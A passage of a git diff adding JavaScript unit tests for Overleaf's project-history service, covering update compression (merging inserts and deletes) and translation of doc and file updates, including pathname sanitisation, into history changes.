meta: { ts: this.ts2, user_id: this.user_id }, + v: 44, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: '/old.tex', + new_pathname: '/new.tex', + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + { + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 44, + }, + ]) + }) + + it('should not append ops from different doc ids', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + doc: 'doc-one', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: 'doc-two', + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + doc: 'doc-one', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: 'doc-two', + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not append ops from different doc pathnames', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + pathname: 'doc-one', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'doc-two', + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + pathname: 'doc-one', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'doc-two', + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it("should not merge updates that track changes and updates that don't", function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + pathname: 'main.tex', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'main.tex', + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id, tc: 'tracking-id' }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + pathname: 'main.tex', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'main.tex', + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id, tc: 'tracking-id' }, + v: 43, + }, + ]) + }) + + it('should not merge undos with regular ops', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + pathname: 'main.tex', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'main.tex', + op: { p: 6, i: 'bar', u: true }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + pathname: 'main.tex', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'main.tex', + op: { p: 6, i: 'bar', u: true }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not merge tracked delete rejections', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + pathname: 'main.tex', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'main.tex', + op: { p: 6, i: 'bar', trackedDeleteRejection: true }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + pathname: 'main.tex', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'main.tex', + op: { p: 6, i: 'bar', trackedDeleteRejection: true }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should preserve history metadata', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo', hpos: 13 }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar', hpos: 16 }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foobar', hpos: 13 }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not merge updates from different users', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo', hpos: 13 }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar', hpos: 16 }, + meta: { ts: this.ts2, user_id: this.other_user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foo', hpos: 13 }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar', hpos: 16 }, + meta: { ts: this.ts2, user_id: this.other_user_id }, + v: 43, + }, + ]) + }) + + it('should not merge inserts inside different comments', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo', hpos: 13, commentIds: ['comment-id-1'] }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar', hpos: 16 }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foo', hpos: 13, commentIds: ['comment-id-1'] }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar', hpos: 16 }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should propagate the commentIds property', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo', hpos: 13, commentIds: ['comment-id-1'] }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar', hpos: 16, commentIds: ['comment-id-1'] }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foobar', hpos: 13, commentIds: ['comment-id-1'] }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + }) + + describe('delete - delete', function () { + it('should append one delete to the other', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 3, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, d: 'foobar' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should insert one delete inside the other', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 1, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 1, d: 'bafoor' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not append separated deletes', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 9, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 9, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not merge deletes over tracked changes', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { + p: 3, + d: 'bar', + trackedChanges: [{ type: 'delete', pos: 2, length: 10 }], + }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { + p: 3, + d: 'bar', + trackedChanges: [{ type: 'delete', pos: 2, length: 10 }], + }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should preserve history metadata', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 3, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, d: 'foobar' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not merge when the deletes are tracked', function () { + // TODO: We should be able to lift that constraint, but it would + // require recalculating the hpos on the second op. + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id, tc: 'tracking-id' }, + v: 42, + }, + { + op: { p: 3, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id, tc: 'tracking-id' }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id, tc: 'tracking-id' }, + v: 42, + }, + { + op: { p: 3, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id, tc: 'tracking-id' }, + v: 43, + }, + ]) + }) + }) + + describe('insert - delete', function () { + it('should undo a previous insert', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 5, d: 'o' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'fo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should remove part of an insert from the middle', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'fobaro' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 5, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should cancel out two opposite updates', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([]) + }) + + it('should not combine separated updates', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 9, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 9, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not combine updates with overlap beyond the end', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foobar' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, d: 'bardle' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foobar' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, d: 'bardle' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should preserver history metadata', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo', hpos: 13 }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 5, d: 'o', hpos: 15 }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'fo', hpos: 13 }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + }) + + describe('delete - insert', function () { + it('should do a diff of the content', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, d: 'one two three four five six seven eight' }, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 100 }, + v: 42, + }, + { + op: { p: 3, i: 'one 2 three four five six seven eight' }, + meta: { ts: this.ts2, user_id: this.user_id, doc_length: 100 }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 7, d: 'two' }, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 100 }, + v: 43, + }, + { + op: { p: 7, i: '2' }, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 97 }, + v: 43, + }, + ]) + }) + + it('should return a no-op if the delete and insert are the same', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, d: 'one two three four five six seven eight' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 3, i: 'one two three four five six seven eight' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([]) + }) + + it('should preserve history metadata', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { + p: 3, + d: 'one two three four five six seven eight', + hpos: 13, + }, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 100 }, + v: 42, + }, + { + op: { + p: 3, + i: 'one 2 three four five six seven eight', + hpos: 13, + commentIds: ['comment-1'], + }, + meta: { ts: this.ts2, user_id: this.user_id, doc_length: 100 }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 7, d: 'two', hpos: 17 }, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 100 }, + v: 43, + }, + { + op: { p: 7, i: '2', hpos: 17, commentIds: ['comment-1'] }, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 97 }, + v: 43, + }, + ]) + }) + + it('should not merge when tracking changes', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, d: 'one two three four five six seven eight' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + doc_length: 100, + tc: 'tracking-id', + }, + v: 42, + }, + { + op: { p: 3, i: 'one 2 three four five six seven eight' }, + meta: { + ts: this.ts2, + user_id: this.user_id, + doc_length: 100, + tc: 'tracking-id', + }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, d: 'one two three four five six seven eight' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + doc_length: 100, + tc: 'tracking-id', + }, + v: 42, + }, + { + op: { p: 3, i: 'one 2 three four five six seven eight' }, + meta: { + ts: this.ts2, + user_id: this.user_id, + doc_length: 100, + tc: 'tracking-id', + }, + v: 43, + }, + ]) + }) + }) + + describe('a long chain of ops', function () { + it('should always split after 60 seconds', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts1 + 20000, user_id: this.user_id }, + v: 43, + }, + { + op: { p: 9, i: 'baz' }, + meta: { ts: this.ts1 + 40000, user_id: this.user_id }, + v: 44, + }, + { + op: { p: 12, i: 'qux' }, + meta: { ts: this.ts1 + 80000, user_id: this.user_id }, + v: 45, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foobarbaz' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 44, + }, + { + op: { p: 12, i: 'qux' }, + meta: { ts: this.ts1 + 80000, user_id: this.user_id }, + v: 45, + }, + ]) + }) + }) + + describe('external updates', function () { + it('should be split from editor updates and from other sources', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + source: 'some-editor-id', + }, + v: 42, + }, + { + op: { p: 6, i: 'bar' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + source: 'some-other-editor-id', + }, + v: 43, + }, + { + op: { p: 9, i: 'baz' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + type: 'external', + source: 'dropbox', + }, + v: 44, + }, + { + op: { p: 12, i: 'qux' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + type: 'external', + source: 'dropbox', + }, + v: 45, + }, + { + op: { p: 15, i: 'quux' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + type: 'external', + source: 'upload', + }, + v: 46, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foobar' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + source: 'some-editor-id', + }, + v: 43, + }, + { + op: { p: 9, i: 'bazqux' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + type: 'external', + source: 'dropbox', + }, + v: 45, + }, + { + op: { p: 15, i: 'quux' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + type: 'external', + source: 'upload', + }, + v: 46, + }, + ]) + }) + }) + + describe('doc hash', function () { + it("should keep the doc hash if it's on the last update", function () { + const meta = { ts: this.ts1, user_id: this.user_id } + expect( + this.UpdateCompressor.compressUpdates([ + { op: { p: 3, i: 'foo' }, meta, v: 42 }, + { + op: { p: 6, i: 'bar' }, + meta: { ...meta, doc_hash: 'hash1' }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foobar' }, + meta: { ...meta, doc_hash: 'hash1' }, + v: 43, + }, + ]) + }) + + it("should not keep the doc hash if it's not on the last update", function () { + const meta = { ts: this.ts1, user_id: this.user_id } + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ...meta, doc_hash: 'hash1' }, + v: 42, + }, + { op: { p: 6, i: 'bar' }, meta, v: 43 }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foobar' }, + meta, + v: 43, + }, + ]) + }) + + it('special case for delete + insert triggering diff', function () { + const meta = { ts: this.ts1, user_id: this.user_id, doc_length: 10 } + expect( + this.UpdateCompressor.compressUpdates([ + { op: { p: 3, d: 'foo' }, meta, v: 42 }, + { + op: { p: 3, i: 'bar' }, + meta: { ...meta, doc_hash: 'hash1' }, + v: 43, + }, + ]) + ).to.deep.equal([ + { op: { p: 3, d: 'foo' }, meta, v: 43 }, + { + op: { p: 3, i: 'bar' }, + meta: { ...meta, doc_length: 7, doc_hash: 'hash1' }, + v: 43, + }, + ]) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/UpdateTranslator/UpdateTranslatorTests.js b/services/project-history/test/unit/js/UpdateTranslator/UpdateTranslatorTests.js new file mode 100644 index 0000000..f285fb4 --- /dev/null +++ b/services/project-history/test/unit/js/UpdateTranslator/UpdateTranslatorTests.js @@ -0,0 +1,1215 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' +import Core from 'overleaf-editor-core' + +const MODULE_PATH = '../../../../app/js/UpdateTranslator.js' + +describe('UpdateTranslator', function () { + beforeEach(async function () { + this.UpdateTranslator = await esmock(MODULE_PATH, { + 'overleaf-editor-core': Core, + }) + this.callback = sinon.stub() + + this.project_id = '59bfd450e3028c4d40a1e9aa' + this.doc_id = '59bfd450e3028c4d40a1e9ab' + this.file_id = '59bfd450e3028c4d40a1easd' + this.user_id = '59bb9051abf6e8682a269b64' + this.version = 0 + this.timestamp = new Date().toJSON() + this.mockBlobHash = '12345abc12345abc12345abc12345abc12345abc' + }) + + describe('convertToChanges', function () { + it('can translate doc additions', function () { + const updates = [ + { + update: { + doc: this.doc_id, + pathname: '/main.tex', + docLines: 'a\nb', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + }, + blobHashes: { file: this.mockBlobHash }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('can translate file additions', function () { + const updates = [ + { + update: { + file: this.file_id, + pathname: '/test.png', + url: 'filestore.example.com/test.png', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + }, + blobHashes: { file: this.mockBlobHash }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'test.png', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('can translate doc renames', function () { + const updates = [ + { + update: { + doc: this.doc_id, + pathname: '/main.tex', + new_pathname: '/new_main.tex', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + newPathname: 'new_main.tex', + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('can translate file renames', function () { + const updates = [ + { + update: { + file: this.file_id, + pathname: '/test.png', + new_pathname: '/new_test.png', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'test.png', + newPathname: 'new_test.png', + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('can translate multiple updates with the correct versions', function () { + const updates = [ + { + update: { + doc: this.doc_id, + pathname: '/main.tex', + docLines: 'a\nb', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + }, + blobHashes: { file: this.mockBlobHash }, + }, + { + update: { + file: this.file_id, + pathname: '/test.png', + url: 'filestore.example.com/test.png', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + }, + blobHashes: { file: this.mockBlobHash }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + { + authors: [], + operations: [ + { + pathname: 'test.png', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('returns an error if the update has an unknown format', function () { + const updates = [ + { + update: { + foo: 'bar', + }, + }, + ] + expect(() => + this.UpdateTranslator.convertToChanges(this.project_id, updates) + ).to.throw('update with unknown format') + }) + + it('replaces backslashes with underscores in pathnames', function () { + const updates = [ + { + update: { + doc: this.doc_id, + pathname: '/\\main\\foo.tex', + new_pathname: '/\\new_main\\foo\\bar.tex', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: '_main_foo.tex', + newPathname: '_new_main_foo_bar.tex', + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('replaces leading asterisks with __ASTERISK__ in pathnames', function () { + const updates = [ + { + update: { + file: this.file_id, + pathname: '/test*test.png', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + url: 'filestore.example.com/test*test.png', + }, + blobHashes: { file: this.mockBlobHash }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'test__ASTERISK__test.png', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('replaces a leading space for top-level files with __SPACE__', function () { + const updates = [ + { + update: { + file: this.file_id, + pathname: '/ test.png', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + url: 'filestore.example.com/test.png', + }, + blobHashes: { file: this.mockBlobHash }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: '__SPACE__test.png', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('replaces leading spaces of files in subfolders with __SPACE__', function () { + const updates = [ + { + update: { + file: this.file_id, + pathname: '/folder/ test.png', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + url: 'filestore.example.com/folder/test.png', + }, + blobHashes: { file: this.mockBlobHash }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'folder/__SPACE__test.png', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('sets a null author when user_id is "anonymous-user"', function () { + const updates = [ + { + update: { + doc: this.doc_id, + pathname: '/main.tex', + docLines: 'a\nb', + meta: { + user_id: 'anonymous-user', + ts: this.timestamp, + }, + }, + blobHashes: { file: this.mockBlobHash }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [null], + timestamp: this.timestamp, + }, + ]) + }) + + it('sets an empty array as author when there is no meta.user_id', function () { + const updates = [ + { + update: { + doc: this.doc_id, + pathname: '/main.tex', + docLines: 'a\nb', + meta: { + ts: this.timestamp, + }, + }, + blobHashes: { file: this.mockBlobHash }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [], + timestamp: this.timestamp, + }, + ]) + }) + + describe('text updates', function () { + it('can translate insertions', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { p: 3, i: 'foo' }, + { p: 15, i: 'bar', commentIds: ['comment1'] }, + ], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + source: 'some-editor-id', + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [ + 3, + 'foo', + 9, + { i: 'bar', commentIds: ['comment1'] }, + 8, + ], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('can translate deletions', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { p: 3, d: 'lo' }, + { p: 10, d: 'bar' }, + ], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [3, -2, 7, -3, 5], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('should translate retains without tracking data', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { + p: 3, + r: 'lo', + }, + ], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [20], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + [this.doc_id]: { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('can translate retains with tracking data', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { + p: 3, + r: 'lo', + tracking: { type: 'none' }, + }, + ], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [ + 3, + { + r: 2, + tracking: { type: 'none' }, + }, + 15, + ], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('can translate insertions at the start and end (with zero retained)', function () { + const updates = [ + { + update: { + doc: 